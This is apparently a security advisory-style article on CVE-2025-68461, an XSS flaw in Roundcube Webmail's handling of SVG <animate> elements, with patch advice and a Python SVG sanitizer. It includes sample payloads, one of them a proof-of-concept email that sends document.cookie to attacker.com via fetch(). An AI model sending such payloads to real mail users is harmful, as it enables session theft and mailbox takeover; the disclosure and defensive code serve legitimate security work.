Roundcube Webmail is a popular open-source webmail client, common in shared hosting and company environments. It is email in your browser, with a clean interface, a focus on usability, and rich HTML rendering. That same HTML rendering is where security problems tend to surface when untrusted markup is not handled *very* carefully.

Recently, a new security vulnerability has been disclosed: CVE-2025-68461. It affects Roundcube Webmail before 1.5.12 and 1.6.x before 1.6.12 and is classified as Cross-Site Scripting (XSS). The root cause lies in how Roundcube sanitizes SVG images embedded in HTML mail, specifically its handling of the <animate> element.

What’s the CVE-2025-68461 Issue?

Summary:
Roundcube renders HTML messages, including inline SVG, after passing them through its HTML sanitizer. Before the fixed versions, that sanitizer did not properly handle content inside SVG animate tags, so an attacker could smuggle JavaScript through them. When the victim opens the crafted message, the code runs in the victim's browser inside their authenticated webmail session.

Why is it dangerous?

The only user interaction required is viewing the message, and anyone can send the victim an email. Script running in the webmail origin can try to read cookies or other session data and, more importantly, perform any action the logged-in user could, such as reading or sending mail.

The Exploit: XSS via SVG Animate Tag

SVG allows for rich graphics in emails, but SVG is XML, and browsers treat inline SVG as part of the page's DOM. Script can hide inside it in several ways: <script> elements, event handler attributes (onload, onbegin, onend and the like), href attributes that accept javascript: URIs, and the SMIL animation elements <animate> and <set>, which both fire events and can rewrite other attributes at runtime.

Here is an example of a malicious SVG payload, the kind of markup an attacker would embed in an HTML email:

<svg xmlns="http://www.w3.org/2000/svg">
  <animate attributeName="x" from="0" to="100" dur="1s"
    onbegin="alert(document.cookie)">
  </animate>
</svg>

What happens here?

- The <animate> element starts its timeline as soon as the SVG is rendered, and its onbegin handler runs the attached JavaScript at that moment. It does not need a valid animation target for this; the begin event fires regardless.

- In an unpatched Roundcube, this SVG reaches the browser with the handler intact, so the attacker's JavaScript executes as soon as the victim opens the message.

Treat this as an illustration of the bug class rather than a verified bypass: Roundcube's HTML washer works from an attribute allow-list, so check the advisory and the fix commit for the exact animate markup that got through the pre-1.5.12 / pre-1.6.12 sanitizer.

*You can replace alert(document.cookie) with any JavaScript, including code that sends data from the victim's session to an attacker-controlled server.*

Full Proof-of-Concept (PoC) Email

Here is an HTML email body you could use to test a vulnerable installation (for demo/authorized testing only!):

<html>
<body>
  <svg xmlns="http://www.w3.org/2000/svg">
    <animate attributeName="x" from="0" to="100" dur="1s"
      onbegin="fetch('https://attacker.com/steal?cookie='+document.cookie)">
    </animate>
  </svg>
</body>
</html>

Against an unpatched Roundcube, this payload executes the JavaScript when the message is displayed and sends document.cookie to attacker.com. One caveat for anyone reproducing this: Roundcube marks its session cookie HttpOnly, so document.cookie will usually not contain it. A realistic payload would instead use the victim's authenticated session directly, for example by issuing requests to Roundcube's own endpoints to read mail or change settings. The impact is the same even when cookie theft fails.

*Note: Never test this on systems you do not own or control.*

References & Original Advisories

- Roundcube security release announcement for versions 1.5.12 and 1.6.12
- CVE record for CVE-2025-68461 (NVD)
- Roundcube Webmail on GitHub

Patch Immediately:

Upgrade Roundcube to at least *1.5.12* (1.5.x branch) or *1.6.12* (1.6.x branch). Only the upgrade fixes the sanitizer itself; everything below is defense in depth.

Disable SVG or sanitize SVG content:

Until you can upgrade, treat inline SVG in mail as active content. Either strip it entirely before display, or run it through an allow-list sanitizer that removes <script>, every on* event handler attribute, javascript: URIs in href/xlink:href, and the animation elements themselves; a deny-list of known bad attributes is not enough, because animation elements can rewrite other attributes after sanitization.
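The following is an added example, not code from the article or from the Roundcube project, showing what the allow-list approach described above looks like in practice and how it handles each of the hiding places listed in the exploit section (on* handlers, javascript: URIs including obfuscated ones, <script>, and the animation elements). It is plain Python on the standard library; the sample SVG is constructed for this example and the hostnames in it are placeholders. For untrusted input in production you would parse with defusedxml rather than xml.etree to rule out XML entity attacks, and you would parse style attributes instead of dropping them.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Serialise the SVG namespace as the default prefix so output stays <svg xmlns="...">
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Allow-list of drawing elements. Anything not listed is removed together with
# its subtree: <script>, <foreignObject>, and every SMIL animation element
# (<animate>, <set>, <animateTransform>, <animateMotion>), so neither their
# on* handlers nor attribute retargeting (e.g. animating href) survives.
ALLOWED_TAGS = {
    "svg", "g", "defs", "title", "desc", "a", "use", "image",
    "rect", "circle", "ellipse", "line", "polyline", "polygon", "path",
    "text", "tspan", "linearGradient", "radialGradient", "stop", "clipPath",
}

# Browsers ignore ASCII control characters and whitespace inside a URL scheme,
# so "java\nscript:" must be normalised before the scheme check.
_CTRL_WS = re.compile(r"[\x00-\x20]")


def _local(qname: str) -> str:
    """'{ns}href' -> 'href'; plain names pass through unchanged."""
    return qname.rsplit("}", 1)[-1]


def _safe_url(value: str, fragment_only: bool = False) -> bool:
    cleaned = _CTRL_WS.sub("", value).lower()
    if cleaned.startswith("#"):          # same-document reference, e.g. href="#grad"
        return True
    if fragment_only:
        return False
    return cleaned.startswith(("http://", "https://"))


def _clean_attributes(el: ET.Element) -> None:
    tag = _local(el.tag)
    for name in list(el.attrib):
        local = _local(name).lower()
        if local.startswith("on"):
            del el.attrib[name]          # onbegin, onload, onclick, ... (event handlers)
        elif local == "href":            # covers both href and xlink:href
            # <use> may only point inside the document; an external target
            # would be fetched and parsed as SVG.
            if not _safe_url(el.attrib[name], fragment_only=(tag == "use")):
                del el.attrib[name]
        elif local == "style":
            del el.attrib[name]          # dropped here; a full sanitiser would parse the CSS


def _walk(el: ET.Element) -> None:
    _clean_attributes(el)
    for child in list(el):
        if _local(child.tag) not in ALLOWED_TAGS:
            el.remove(child)             # removes the element and everything beneath it
        else:
            _walk(child)


def sanitize_svg(markup: str) -> str:
    """Return a copy of `markup` with active content removed."""
    root = ET.fromstring(markup)
    if _local(root.tag) != "svg":
        raise ValueError("root element must be <svg>")
    _walk(root)
    return ET.tostring(root, encoding="unicode")


# Constructed test document (not a real-world sample): the article's onbegin
# payload plus the other hiding places discussed above.
HOSTILE_SVG = """<svg xmlns="http://www.w3.org/2000/svg">
  <rect width="10" height="10">
    <animate attributeName="x" from="0" to="100" dur="1s" onbegin="alert(document.cookie)"/>
  </rect>
  <a href="javascript:alert(1)"><text>click</text></a>
  <a href="java&#10;script:alert(1)"><text>click</text></a>
  <image href="https://example.invalid/ok.png" onload="alert(1)"/>
  <use href="https://example.invalid/ext.svg#g"/>
  <script>alert(1)</script>
</svg>"""

if __name__ == "__main__":
    print(sanitize_svg(HOSTILE_SVG))
```

Running it prints the same drawing with the <animate> and <script> elements gone, both <a> elements stripped of their href (the second one shows why the scheme check must normalise control characters first), the <image> kept with its https href but without onload, and the <use> left without its external reference. Because the XML parser decodes character references before the sanitizer looks at attribute values, entity-encoded tricks such as &#106;avascript: are handled by the same check.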

Final Thoughts

XSS in webmail is among the highest-impact web bugs, especially when it needs no interaction beyond opening a message: the attacker controls the input channel, since anyone can email the victim, and the payload runs with the victim's mailbox privileges. This case shows once again that SVG in HTML mail is dangerous unless all scripts, event handlers, and animation elements are removed.

If you run or depend on Roundcube Webmail, update now. And remember: never trust user-controlled HTML, least of all SVG.


*Stay safe! For more details, check the advisories above or track the official CVE page.*

Timeline

Published on: 12/18/2025 05:00:54 UTC
Last modified on: 02/23/2026 13:24:12 UTC